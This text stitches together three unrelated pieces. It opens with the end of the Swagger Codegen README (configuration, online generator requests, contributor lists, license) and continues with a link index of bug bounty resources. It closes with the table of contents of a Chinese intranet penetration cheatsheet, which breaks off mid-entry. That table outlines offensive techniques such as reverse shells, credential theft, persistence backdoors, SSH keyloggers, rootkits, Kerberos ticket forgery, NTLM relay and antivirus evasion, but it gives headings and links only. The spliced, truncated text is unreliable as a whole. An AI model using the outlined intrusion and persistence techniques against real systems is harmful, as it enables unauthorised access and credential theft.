JavaClientCodegen.java JavaInflectorServerCodegen.java JavaJerseyServerCodegen.java JavaResteasyServerCodegen.java JavascriptClientCodegen.java NodeJSServerCodegen.java NancyFXServerCodegen ObjcClientCodegen.java PerlClientCodegen.java PhpClientCodegen.java PythonClientCodegen.java Qt5CPPGenerator.java RubyClientCodegen.java ScalaClientCodegen.java ScalatraServerCodegen.java SilexServerCodegen.java SinatraServerCodegen.java SlimFrameworkServerCodegen.java SpringMVCServerCodegen.java StaticDocCodegen.java StaticHtmlGenerator.java SwaggerGenerator.java SwaggerYamlGenerator.java SwiftCodegen.java TizenClientCodegen.java TypeScriptAngularClientCodegen.java TypeScriptNodeClientCodegen.java ``` Each of these files creates reasonable defaults so you can get running quickly. But if you want to configure package names, prefixes, model folders, etc. you can use a json config file to pass the values. ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l java \ -o samples/client/petstore/java \ -c path/to/config.json ``` and `config.json` contains the following as an example: ``` { "apiPackage" : "petstore" } ``` Supported config options can be different per language. Running `config-help -l {lang}` will show available options. **These options are applied via configuration file (e.g. config.json) or by passing them with `-D{optionName}={optionValue}`**. (If `-D{optionName}` does not work, please open a [ticket](https://github.com/swagger-api/swagger-codegen/issues/new) and we'll look into it) ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l java ``` Output ``` CONFIG OPTIONS modelPackage package for generated models apiPackage package for generated api classes sortParamsByRequiredFlag Sort method arguments to place required parameters before optional parameters. Default: true invokerPackage root package for generated code groupId groupId in generated pom.xml artifactId artifactId in generated pom.xml artifactVersion artifact version in generated pom.xml sourceFolder source folder for generated code localVariablePrefix prefix for generated code members and local variables serializableModel boolean - toggle "implements Serializable" for generated models library library template (sub-template) to use: jersey1 - HTTP client: Jersey client 1.18. JSON processing: Jackson 2.4.2 jersey2 - HTTP client: Jersey client 2.6 feign - HTTP client: Netflix Feign 8.1.1. JSON processing: Jackson 2.6.3 okhttp-gson (default) - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 retrofit - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 (Retrofit 1.9.0) retrofit2 - HTTP client: OkHttp 2.5.0. JSON processing: Gson 2.4 (Retrofit 2.0.0-beta2) ``` Your config file for Java can look like ```json { "groupId":"com.my.company", "artifactId":"MyClient", "artifactVersion":"1.2.0", "library":"feign" } ``` For all the unspecified options default values will be used. Another way to override default options is to extend the config class for the specific language. To change, for example, the prefix for the Objective-C generated files, simply subclass the ObjcClientCodegen.java: ```java package com.mycompany.swagger.codegen; import io.swagger.codegen.languages.*; public class MyObjcCodegen extends ObjcClientCodegen { static { PREFIX = "HELO"; } } ``` and specify the `classname` when running the generator: ``` -l com.mycompany.swagger.codegen.MyObjcCodegen ``` Your subclass will now be loaded and overrides the `PREFIX` value in the superclass. ### Bringing your own models Sometimes you don't want a model generated. In this case, you can simply specify an import mapping to tell the codegen what _not_ to create. When doing this, every location that references a specific model will refer back to your classes. Note, this may not apply to all languages... To specify an import mapping, use the `--import-mappings` argument and specify the model-to-import logic as such: ``` --import-mappings Pet=my.models.MyPet ``` Or for multiple mappings: ``` Pet=my.models.MyPet,Order=my.models.MyOrder ``` ### Validating your OpenAPI Spec You have options. The easiest is to use our [online validator](https://github.com/swagger-api/validator-badge) which not only will let you validate your spec, but with the debug flag, you can see what's wrong with your spec. For example: http://online.swagger.io/validator/debug?url=http://petstore.swagger.io/v2/swagger.json ### Generating dynamic html api documentation To do so, just use the `-l dynamic-html` flag when reading a spec file. This creates HTML documentation that is available as a single-page application with AJAX. To view the documentation: ``` cd samples/dynamic-html/ npm install node . ``` Which launches a node.js server so the AJAX calls have a place to go. ### Generating static html api documentation To do so, just use the `-l html` flag when reading a spec file. This creates a single, simple HTML file with embedded css so you can ship it as an email attachment, or load it from your filesystem: ``` cd samples/html/ open index.html ``` ### To build a server stub Please refer to https://github.com/swagger-api/swagger-codegen/wiki/Server-stub-generator-HOWTO for more information. ### To build the codegen library This will create the swagger-codegen library from source. ``` mvn package ``` Note! The templates are included in the library generated. If you want to modify the templates, you'll need to either repackage the library OR specify a path to your scripts ## Workflow integration You can use the [swagger-codegen-maven-plugin](modules/swagger-codegen-maven-plugin/README.md) for integrating with your workflow, and generating any codegen target. ## GitHub Integration To push the auto-generated SDK to GitHub, we provide `git_push.sh` to streamline the process. For example: 1) Create a new repository in GitHub (Ref: https://help.github.com/articles/creating-a-new-repository/) 2) Generate the SDK ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i modules/swagger-codegen/src/test/resources/2_0/petstore.json -l perl \ --git-user-id "wing328" \ --git-repo-id "petstore-perl" \ --release-note "Github integration demo" \ -o /var/tmp/perl/petstore ``` 3) Push the SDK to GitHub ``` cd /var/tmp/perl/petstore /bin/sh ./git_push.sh ``` ## Online generators One can also generate API client or server using the online generators (https://generator.swagger.io) For example, to generate Ruby API client, simply send the following HTTP request using curl: ``` curl -X POST -H "content-type:application/json" -d '{"swaggerUrl":"http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/ruby ``` Then you will receieve a JSON response with the URL to download the zipped code. To customize the SDK, you can `POST` to `https://generator.swagger.io/gen/clients/{language}` with the following HTTP body: ``` { "options": {}, "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" } ``` in which the `options` for a language can be obtained by submitting a `GET` request to `https://generator.swagger.io/api/gen/clients/{language}`: For example, `curl https://generator.swagger.io/api/gen/clients/python` returns ``` { "packageName":{ "opt":"packageName", "description":"python package name (convention: snake_case).", "type":"string", "default":"swagger_client" }, "packageVersion":{ "opt":"packageVersion", "description":"python package version.", "type":"string", "default":"1.0.0" }, "sortParamsByRequiredFlag":{ "opt":"sortParamsByRequiredFlag", "description":"Sort method arguments to place required parameters before optional parameters.", "type":"boolean", "default":"true" } } ``` To set package name to `pet_store`, the HTTP body of the request is as follows: ``` { "options": { "packageName": "pet_store" }, "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" } ``` and here is the curl command: ``` curl -H "Content-type: application/json" -X POST -d '{"options": {"packageName": "pet_store"},"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/python ``` Guidelines for Contribution --------------------------- Please refer to this [page](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) Companies/Projects using Swagger Codegen ---------------------------------------- Here are some companies/projects using Swagger Codegen in production. To add your company/project to the list, please visit [README.md](https://github.com/swagger-api/swagger-codegen/blob/master/README.md) and click on the icon to edit the page. - [Activehours](https://www.activehours.com/) - [Acunetix](https://www.acunetix.com/) - [Atlassian](https://www.atlassian.com/) - [Autodesk](http://www.autodesk.com/) - [Avenida Compras S.A.](https://www.avenida.com.ar) - [AYLIEN](http://aylien.com/) - [Balance Internet](https://www.balanceinternet.com.au/) - [beemo](http://www.beemo.eu) - [bitly](https://bitly.com) - [Bufferfly Network](https://www.butterflynetinc.com/) - [Cachet Financial](http://www.cachetfinancial.com/) - [carpolo](http://www.carpolo.co/) - [CloudBoost](https://www.CloudBoost.io/) - [Conplement](http://www.conplement.de/) - [Cummins](http://www.cummins.com/) - [Cupix](http://www.cupix.com) - [DBBest Technologies](https://www.dbbest.com) - [DecentFoX](http://decentfox.com/) - [DocRaptor](https://docraptor.com) - [DocuSign](https://www.docusign.com) - [Ergon](http://www.ergon.ch/) - [EMC](https://www.emc.com/) - [eureka](http://eure.jp/) - [everystory.us](http://everystory.us) - [Expected Behavior](http://www.expectedbehavior.com/) - [Fastly](https://www.fastly.com/) - [Flat](https://flat.io) - [Finder](http://en.finder.pl/) - [FH Münster - University of Applied Sciences](http://www.fh-muenster.de) - [Fotition](https://www.fotition.com/) - [Gear Zero Network](https://www.gearzero.ca) - [Germin8](http://www.germin8.com) - [goTransverse](http://www.gotransverse.com/api) - [GraphHopper](https://graphhopper.com/) - [Gravitate Solutions](http://gravitatesolutions.com/) - [HashData](http://www.hashdata.cn/) - [Hewlett Packard Enterprise](https://hpe.com) - [High Technologies Center](http://htc-cs.com) - [IBM](https://www.ibm.com) - [IMS Health](http://www.imshealth.com/en/solution-areas/technology-and-applications) - [Intent HQ](http://www.intenthq.com) - [Interactive Intelligence](http://developer.mypurecloud.com/) - [Kabuku](http://www.kabuku.co.jp/en) - [Kurio](https://kurio.co.id) - [Kuroi](http://kuroiwebdesign.com/) - [Kuary](https://kuary.com/) - [Kubernetes](https://kubernetes.io/) - [LANDR Audio](https://www.landr.com/) - [Lascaux](http://www.lascaux.it/) - [Leica Geosystems AG](http://leica-geosystems.com) - [LiveAgent](https://www.ladesk.com/) - [LXL Tech](http://lxltech.com) - [Lyft](https://www.lyft.com/developers) - [MailMojo](https://mailmojo.no/) - [Mindera](http://mindera.com/) - [Mporium](http://mporium.com/) - [Neverfail](https://neverfail.com/) - [nViso](http://www.nviso.ch/) - [Okiok](https://www.okiok.com) - [Onedata](http://onedata.org) - [OrderCloud.io](http://ordercloud.io) - [OSDN](https://osdn.jp) - [PagerDuty](https://www.pagerduty.com) - [PagerTree](https://pagertree.com) - [Pepipost](https://www.pepipost.com) - [Plexxi](http://www.plexxi.com) - [Pixoneye](http://www.pixoneye.com/) - [PostAffiliatePro](https://www.postaffiliatepro.com/) - [PracticeBird](https://www.practicebird.com/) - [Prill Tecnologia](http://www.prill.com.br) - [QAdept](http://qadept.com/) - [QuantiModo](https://quantimo.do/) - [QuickBlox](https://quickblox.com/) - [Rapid7](https://rapid7.com/) - [Reload! A/S](https://reload.dk/) - [REstore](https://www.restore.eu) - [Revault Sàrl](http://revault.ch) - [Riffyn](https://riffyn.com) - [Royal Bank of Canada (RBC)](http://www.rbc.com/canada.html) - [Saritasa](https://www.saritasa.com/) - [SCOOP Software GmbH](http://www.scoop-software.de) - [Shine Solutions](https://shinesolutions.com/) - [Simpfony](https://www.simpfony.com/) - [Skurt](http://www.skurt.com) - [Slamby](https://www.slamby.com/) - [SmartRecruiters](https://www.smartrecruiters.com/) - [snapCX](https://snapcx.io) - [SPINEN](http://www.spinen.com) - [SRC](https://www.src.si/) - [Stingray](http://www.stingray.com) - [StyleRecipe](http://stylerecipe.co.jp) - [Svenska Spel AB](https://www.svenskaspel.se/) - [TaskData](http://www.taskdata.com/) - [ThoughtWorks](https://www.thoughtworks.com) - [Upwork](http://upwork.com/) - [uShip](https://www.uship.com/) - [VMware](https://vmware.com/) - [W.UP](http://wup.hu/?siteLang=en) - [Wealthfront](https://www.wealthfront.com/) - [Webever GmbH](https://www.webever.de/) - [WEXO A/S](https://www.wexo.dk/) - [Zalando](https://tech.zalando.com) - [ZEEF.com](https://zeef.com/) # Swagger Codegen Core Team Swagger Codegen core team members are contributors who have been making significant contributions (review issues, fix bugs, make enhancements, etc) to the project on a regular basis. ## API Clients | Languages | Core Team (join date) | |:-------------|:-------------| | ActionScript | | | C++ | | | C# | @jimschubert (2016/05/01) | | | Clojure | @xhh (2016/05/01) | | Dart | | | Groovy | | | Go | @guohuang (2016/05/01) @neilotoole (2016/05/01) | | Java | @cbornet (2016/05/01) @xhh (2016/05/01) @epaul (2016/06/04) | | Java (Spring Cloud) | @cbornet (2016/07/19) | | NodeJS/Javascript | @xhh (2016/05/01) | | ObjC | @mateuszmackowiak (2016/05/09) | | Perl | @wing328 (2016/05/01) | | PHP | @arnested (2016/05/01) | | Python | @scottrw93 (2016/05/01) | | Ruby | @wing328 (2016/05/01) @zlx (2016/05/22) | | Scala | | | Swift | @jaz-ah (2016/05/01) @Edubits (2016/05/01) | | TypeScript (Node) | @Vrolijkx (2016/05/01) | | TypeScript (Angular1) | @Vrolijkx (2016/05/01) | | TypeScript (Angular2) | @Vrolijkx (2016/05/01) | | TypeScript (Fetch) | | ## Server Stubs | Languages | Core Team (date joined) | |:------------- |:-------------| | C# ASP.NET5 | @jimschubert (2016/05/01) | | Go Server | @guohuang (2016/06/13) | | Haskell Servant | | | Java Spring Boot | @cbornet (2016/07/19) | | Java Spring MVC | @kolyjjj (2016/05/01) @cbornet (2016/07/19) | | Java JAX-RS | | | Java Play Framework | | | NancyFX | | | NodeJS | @kolyjjj (2016/05/01) | | PHP Lumen | @abcsum (2016/05/01) | | PHP Silex | | | PHP Slim | | | Python Flask | | | Ruby Sinatra | @wing328 (2016/05/01) | | | Scala Scalatra | | | | Scala Finch | @jimschubert (2017/01/28) | ## Template Creator Here is a list of template creators: * API Clients: * Akka-Scala: @cchafer * Bash: @bkryza * C++ REST: @Danielku15 * C# (.NET 2.0): @who * Clojure: @xhh * Dart: @yissachar * Elixir: @niku * Groovy: @victorgit * Go: @wing328 * Java (Feign): @davidkiss * Java (Retrofit): @0legg * Java (Retrofi2): @emilianobonassi * Java (Jersey2): @xhh * Java (okhttp-gson): @xhh * Javascript/NodeJS: @jfiala * Javascript (Closure-annotated Angular) @achew22 * JMeter @davidkiss * Perl: @wing328 * Swift: @tkqubo * Swift 3: @hexelon * TypeScript (Node): @mhardorf * TypeScript (Angular1): @mhardorf * TypeScript (Fetch): @leonyu * TypeScript (Angular2): @roni-frantchi * TypeScript (jQuery): @bherila * Server Stubs * C# ASP.NET5: @jimschubert * C# NancyFX: @mstefaniuk * Erlang Server: @galaxie * Go Server: @guohuang * Haskell Servant: @algas * Java MSF4J: @sanjeewa-malalgoda * Java Spring Boot: @diyfr * Java Undertow: @stevehu * Java Play Framework: @JFCote * JAX-RS RestEasy: @chameleon82 * JAX-RS CXF: @hiveship * JAX-RS CXF (CDI): @nickcmaynard * JAX-RS RestEasy (JBoss EAP): @jfiala * PHP Lumen: @abcsum * PHP Slim: @jfastnacht * PHP Zend Expressive (with Path Handler): @Articus * Ruby on Rails 5: @zlx * Scala Finch: @jimschubert * Documentation * HTML Doc 2: @jhitchcock * Confluence Wiki: @jhitchcock ## How to join the core team Here are the requirements to become a core team member: - rank within top 50 in https://github.com/swagger-api/swagger-codegen/graphs/contributors - to contribute, here are some good [starting points](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22) - regular contributions to the project - about 3 hours per week - for contribution, it can be addressing issues, reviewing PRs submitted by others, submitting PR to fix bugs or make enhancements, etc To join the core team, please reach out to wing328hk@gmail.com (@wing328) for more information. To become a Template Creator, simply submit a PR for new API client (e.g. Rust, Elixir) or server stub (e.g. Ruby Grape) generator. # Swagger Codegen Evangelist Swagger Codegen Evangelist shoulders one or more of the following responsibilities: - publishes articles on the benefit of Swagger Codegen - organizes local Meetups - presents the benefits of Swagger Codegen in local Meetups or conferences - actively answers questions from others in [Github](https://github.com/swagger-api/swagger-codegen/issues), [StackOverflow](stackoverflow.com/search?q=%5Bswagger%5D) - submits PRs to improve Swagger Codegen - reviews PRs submitted by the others - ranks within top 100 in the [contributor list](https://github.com/swagger-api/swagger-codegen/graphs/contributors) If you want to be a Swagger Codegen Evangelist, please kindly apply by sending an email to wing328hk@gmail.com (@wing328) ### List of Swagger Codegen Evangelists - Cliffano Subagio (@cliffano from Australia joined on Dec 9, 2016) - [Building An AEM API Clients Ecosystem](http://www.slideshare.net/cliffano/building-an-aem-api-clients-ecosystem) - [Adobe Marketing Cloud Community Expo](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/) # License information on Generated Code The Swagger Codegen project is intended as a benefit for users of the Swagger / Open API Specification. The project itself has the [License](#license) as specified. In addition, please understand the following points: * The templates included with this project are subject to the [License](#license). * Generated code is intentionally _not_ subject to the parent project license When code is generated from this project, it shall be considered **AS IS** and owned by the user of the software. There are no warranties--expressed or implied--for generated code. You can do what you wish with it, and once generated, the code is your responsibility and subject to the licensing terms that you deem appropriate. License ------- Copyright 2017 SmartBear Software Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at [apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0) Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --- <img src="http://swagger.io/wp-content/uploads/2016/02/logo.jpg"/>
# Bug Bounty Helpdesk(Under Development) > Note: Contents inside the **RESETHACKER Community** are to help our community members and content belongs to respective Authors and RESETHACKER Team. BugBounty HelpDesk | Title -- | -- **0** Bug bounty FAQ | [Friendly Q/A](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md) **0** ResetHacker- Setup HelpDesk | [Pentesting/Bug Bounty/DevSecOps Setups in window, linux, docker and vps(aws, azure,gcp etc)](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup) **0** Ignitetechnologies & ResetHacker | [Burp Suite for Pentester and cheatsheet to hunt the vulnerabilities](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/burpsuite.md) **0** Harsh-Bothra | [Learn 365 Challenge for Beginners/Intermidate - Take it as a refererance to Challenge yourself](https://github.com/harsh-bothra/learn365) **0** hakluke | [Bug-bounty-standards - A list of edge cases that occur in bug bounty programs, conversations on how they should be handled.](https://github.com/hakluke/bug-bounty-standards) **0** Cipher387 | [Dork Collection for different search engine:](https://github.com/cipher387/Dorks-collections-list) **0** Luke Stephens | [How to Regex: A Practical Guide to Regular Expressions (Regex) for Hackers](https://www.bugcrowd.com/blog/how-to-regex-a-practical-guide-to-regular-expressions-regex-for-hackers/) **0** Streaak | [Got an API use Keyhacks](https://github.com/streaak/keyhacks) **0** Vikram | [JavaScript - Content discovery](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/javascript.md) **0** Wordlists | [All Wordlists at one place](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists/AllWordlists.md) **0** Bug bounty writeups | [Vulnerability based write ups at one place](https://github.com/alexbieber/Bug_Bounty_writeups) **0** Bug Bounty Mind-Map collection | [Bugbounty Mindmap curated by all the amazing bughunters.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty/BBMindmap) **0** Public Bug bounty | [Collection of public Bugbounty program](https://github.com/resethacker/public-bugbounty-programs) **0** StayUpToDate | [Latest reward, CVE, writeups, tools, Reports, Disclosures and on going trend in Community.](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) BugBounty HelpDesk | Title -- | -- **1** HackTricks | [Pentesting & bugbounty Methodology](https://book.hacktricks.xyz/pentesting-methodology) **2** Six2dez | [Web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist) **3** gowthams | [Help bug bounty hunters with resources](https://gowthams.gitbook.io/bughunter-handbook/bugbounty-short-write-ups) **4** The Web Application Security Consortium | [The WASC Threat Classification v2.0](http://projects.webappsec.org/w/page/13246978/Threat-Classification) **5** kathan19 | [HowToHunt](https://kathan19.gitbook.io/howtohunt/) **6** Ninad Mathpati | [Securityboat](https://workbook.securityboat.in/) **7** Book of Bug Bounty Tips | [Collection of "BugBounty" Tips tweeted / shared by community people.](https://gowsundar.gitbook.io/book-of-bugbounty-tips/) **8** EdOverflow | [Cheatsheets and Must checkout for subdomains Takeover](https://github.com/EdOverflow/bugbounty-cheatsheet) **9** Harsh-Bothra | [Security Explained - Highly recommend to understabd vulnerable code-** files](https://github.com/harsh-bothra/SecurityExplained/tree/main/resources) **10** Security protection | [Curated lists of tools, tips and resources for protecting digital security and privacy](https://security-list.js.org/#/) **11** Offensive Security Cheetsheet | [Web Pentesting and bug bounty](https://cheatsheet.haax.fr/web-pentest/bug_bounty_tips/) **12** @zapstiko | [curate bogbounty resource from twitter](https://github.com/zapstiko/Bug-Bounty) **13** AllVideoPocsFromHackerOne | [TOP 20 Weakness from HackerOne disclosed Reports](https://github.com/zeroc00I/AllVideoPocsFromHackerOne) ## Getting started with BugBounty - Under development 1. | [Resources for getting started with BugBounty -BBb_00 ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBbasics.md) 2. | [Resources for Web Pentesting: Let's Hunt - BBh_01 - under development ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBintermediate.md) This contains the detailed resources for people getting started with BugBounty. Index | [BugBounty Basic -BBb_00 ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBbasics.md) --- | --- **1** | Linux Distributions **2** | Basic Understanding the web application before you start Hunting **3** | Learning resources **4** | Paid Certifications / courses **5** | Bug Bounty platforms offers Bounty **6** | Practice platform **7** | [Talks - Bug Bounty] **8** | [Pentesting & Bug Hunting Resources - How to Start?] **9** | [Bug reports] **10** | [Vulnerabilt] Assesment and one liners] **11** | [Bug hunting Reconnaissance writeups] **12** | [Tools for bug bounty] **13** | [Ebooks] **14** | [Misc] This contains the detailed Resources for people **Already Doing BugBounty** Index | [Web pentesting : Let's Hunt - BBh_01 - Under development](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBintermediate.md) --- | --- **1** | [Pentesting Reports/Disclosures ] **2** | [Web Pentesting MindMaps] **3** | [Web security Testing Writeups] **4** | [Bugbounty Reports/Disclosures ] **5** | [Bugbounty Methodology/Reconnaissance]
# Intranet Penetration CheetSheets Modified by: [z3r0yu](https://twitter.com/zeroyu_) Blog: http://zeroyu.xyz Table of Contents ================= * [信息搜集](#信息搜集) * [开源情报信息收集(OSINT)](#开源情报信息收集osint) * [github](#github) * [whois查询/注册人反查/邮箱反查/相关资产](#whois查询注册人反查邮箱反查相关资产) * [google hacking](#google-hacking) * [创建企业密码字典](#创建企业密码字典) * [字典列表](#字典列表) * [密码生成](#密码生成) * [邮箱列表获取](#邮箱列表获取) * [泄露密码查询](#泄露密码查询) * [对企业外部相关信息进行搜集](#对企业外部相关信息进行搜集) * [子域名获取](#子域名获取) * [进入内网](#进入内网) * [基于企业弱账号漏洞](#基于企业弱账号漏洞) * [基于系统漏洞进入](#基于系统漏洞进入) * [网站应用程序渗透](#网站应用程序渗透) * [无线Wi-Fi接入](#无线wi-fi接入) * [隐匿攻击](#隐匿攻击) * [Command and Control](#command-and-control) * [Fronting](#fronting) * [代理](#代理) * [内网跨边界应用](#内网跨边界应用) * [内网跨边界转发](#内网跨边界转发) * [内网跨边界代理穿透](#内网跨边界代理穿透) * [<a href="https://rootkiter.com/EarthWorm/" rel="nofollow">EW</a>](#ew) * [<a href="https://rootkiter.com/Termite/" rel="nofollow">Termite</a>](#termite) * [代理脚本](#代理脚本) * [shell反弹](#shell反弹) * [内网文件的传输和下载](#内网文件的传输和下载) * [搭建 HTTP server](#搭建-http-server) * [内网信息搜集](#内网信息搜集) * [本机信息搜集](#本机信息搜集) * [1. 用户列表](#1用户列表) * [2. 进程列表](#2进程列表) * [3. 服务列表](#3服务列表) * [4. 端口列表](#4端口列表) * [5. 补丁列表](#5补丁列表) * [6. 本机共享](#6本机共享) * [7. 本用户习惯分析](#7本用户习惯分析) * [8. 获取当前用户密码工具](#8获取当前用户密码工具) * [Windows](#windows) * [Linux](#linux) * [扩散信息收集](#扩散信息收集) * [端口扫描](#端口扫描) * [常用端口扫描工具](#常用端口扫描工具) * [网卡信息扫描(开放135端口)](#网卡信息扫描(开放135端口)) * [内网拓扑架构分析](#内网拓扑架构分析) * [常见信息收集命令](#常见信息收集命令) * [第三方信息收集](#第三方信息收集) * [权限提升](#权限提升) * [Windows](#windows-1) * [BypassUAC](#bypassuac) * [常用方法](#常用方法) * [常用工具](#常用工具) * [提权](#提权) * [Linux](#linux-1) * [内核溢出提权](#内核溢出提权) * [计划任务](#计划任务) * [SUID](#suid) * [系统服务的错误权限配置漏洞](#系统服务的错误权限配置漏洞) * [不安全的文件/文件夹权限配置](#不安全的文件文件夹权限配置) * [找存储的明文用户名,密码](#找存储的明文用户名密码) * [权限维持](#权限维持) * [系统后门](#系统后门) * [Windows](#windows-2) * [1. 密码记录工具](#1密码记录工具) * [2. 常用的存储Payload位置](#2常用的存储payload位置) * [3. Run/RunOnce Keys](#3runrunonce-keys) * [4. BootExecute Key](#4bootexecute-key) * [5. Userinit Key](#5userinit-key) * [6. Startup Keys](#6startup-keys) * [7. Services](#7services) * [8. Browser Helper Objects](#8browser-helper-objects) * [9. AppInit_DLLs](#9appinit_dlls) * [10. 文件关联](#10文件关联) * [11. <a href="http://www.liuhaihua.cn/archives/357579.html" rel="nofollow">bitsadmin</a>](#11bitsadmin) * [12. <a href="https://evi1cg.me/archives/Powershell_MOF_Backdoor.html" rel="nofollow">mof </a>](#12mof-) * [13. <a href="https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/" rel="nofollow">wmi</a>](#13wmi) * [14. <a href="https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/" rel="nofollow">Userland Persistence With Scheduled Tasks</a>](#14userland-persistence-with-scheduled-tasks) * [15. <a href="https://3gstudent.github.io/3gstudent.github.io/Netsh-persistence/" rel="nofollow">Netsh</a>](#15netsh) * [16. <a href="https://3gstudent.github.io/3gstudent.github.io/渗透测试中的Application-Compatibility-Shims/" rel="nofollow">Shim</a>](#16shim) * [17. <a href="https://3gstudent.github.io/3gstudent.github.io/DLL劫持漏洞自动化识别工具Rattler测试/" rel="nofollow">DLL劫持</a>](#17dll劫持) * [18. <a href="https://3gstudent.github.io/3gstudent.github.io/渗透测试中的Application-Verifier(DoubleAgent利用介绍)/" rel="nofollow">DoubleAgent </a>](#18doubleagent-) * [19. <a href="https://3gstudent.github.io/3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence/" rel="nofollow">waitfor.exe </a>](#19waitforexe-) * [20. <a href="https://3gstudent.github.io/3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence/" rel="nofollow">AppDomainManager</a>](#20appdomainmanager) * [21. Office](#21office) * [22. <a href="https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/" rel="nofollow">CLR</a>](#22clr) * [23. <a href="https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/" rel="nofollow">msdtc</a>](#23msdtc) * [24. <a href="https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator/" rel="nofollow">Hijack CAccPropServicesClass and MMDeviceEnumerato</a>](#24hijack-caccpropservicesclass-and-mmdeviceenumerato) * [25. <a href="https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe/" rel="nofollow">Hijack explorer.exe</a>](#25hijack-explorerexe) * [26. Windows FAX DLL Injection](#26windows-fax-dll-injection) * [27. 特殊注册表键值](#27特殊注册表键值) * [28. 快捷方式后门](#28快捷方式后门) * [29. <a href="https://3gstudent.github.io/3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence/" rel="nofollow">Logon Scripts</a>](#29logon-scripts) * [30. <a href="https://3gstudent.github.io/3gstudent.github.io/Password-Filter-DLL在渗透测试中的应用/" rel="nofollow">Password Filter DLL</a>](#30password-filter-dll) * [31. <a href="https://3gstudent.github.io/3gstudent.github.io/利用BHO实现IE浏览器劫持/" rel="nofollow">利用BHO实现IE浏览器劫持</a>](#31利用bho实现ie浏览器劫持) * [Linux](#linux-2) * [crontab](#crontab) * [硬链接sshd](#硬链接sshd) * [SSH Server wrapper](#ssh-server-wrapper) * [SSH keylogger](#ssh-keylogger) * [Cymothoa_进程注入backdoor](#cymothoa_进程注入backdoor) * [Vegile_进程注入backdoor](#Vegile_进程注入backdoor) * [rootkit](#rootkit) * [Tools](#tools) * [WEB后门](#web后门) * [横向渗透](#横向渗透) * [端口渗透](#端口渗透) * [端口扫描](#端口扫描-1) * [端口爆破](#端口爆破) * [端口弱口令](#端口弱口令) * [端口溢出](#端口溢出) * [常见的默认端口](#常见的默认端口) * [1. web类(web漏洞/敏感目录)](#1web类web漏洞敏感目录) * [2. 数据库类(扫描弱口令)](#2数据库类扫描弱口令) * [3. 特殊服务类(未授权/命令执行类/漏洞)](#3特殊服务类未授权命令执行类漏洞) * [4. 常用端口类(扫描弱口令/端口爆破)](#4常用端口类扫描弱口令端口爆破) * [5. 端口合计所对应的服务](#5端口合计所对应的服务) * [域渗透](#域渗透) * [信息搜集](#信息搜集-1) * [powerview.ps1](#powerviewps1) * [BloodHound](#bloodhound) * [获取域内DNS信息](#获取域内dns信息) * [获取域控的方法](#获取域控的方法) * [SYSVOL](#sysvol) * [MS14-068 Kerberos](#ms14-068-kerberos) * [SPN扫描](#spn扫描) * [Kerberos的黄金门票](#kerberos的黄金门票) * [Kerberos的银票务](#kerberos的银票务) * [域服务账号破解](#域服务账号破解) * [凭证盗窃](#凭证盗窃) * [NTLM relay](#ntlm-relay) * [Kerberos委派](#kerberos委派) * [地址解析协议](#地址解析协议) * [获取AD哈希](#获取ad哈希) * [AD持久化](#ad持久化) * [活动目录持久性技巧](#活动目录持久性技巧) * [Security Support Provider](#security-support-provider) * [<a href="https://adsecurity.org/?p=1772" rel="nofollow">SID History</a>](#sid-history) * [<a href="https://adsecurity.org/?p=1906" rel="nofollow">AdminSDHolder&SDProp </a>](#adminsdholdersdprop-) * [组策略](#组策略) * [Hook PasswordChangeNotify](#hook-passwordchangenotify) * [Kerberoasting后门](#kerberoasting后门) * [AdminSDHolder](#adminsdholder) * [Delegation](#delegation) * [其他](#其他) * [域内主机提权](#域内主机提权) * [Exchange的利用](#exchange的利用) * [TIPS](#tips) * [相关工具](#相关工具) * [在远程系统上执行程序](#在远程系统上执行程序) * [IOT相关](#iot相关) * [中间人](#中间人) * [规避杀软及检测](#规避杀软及检测) * [Bypass 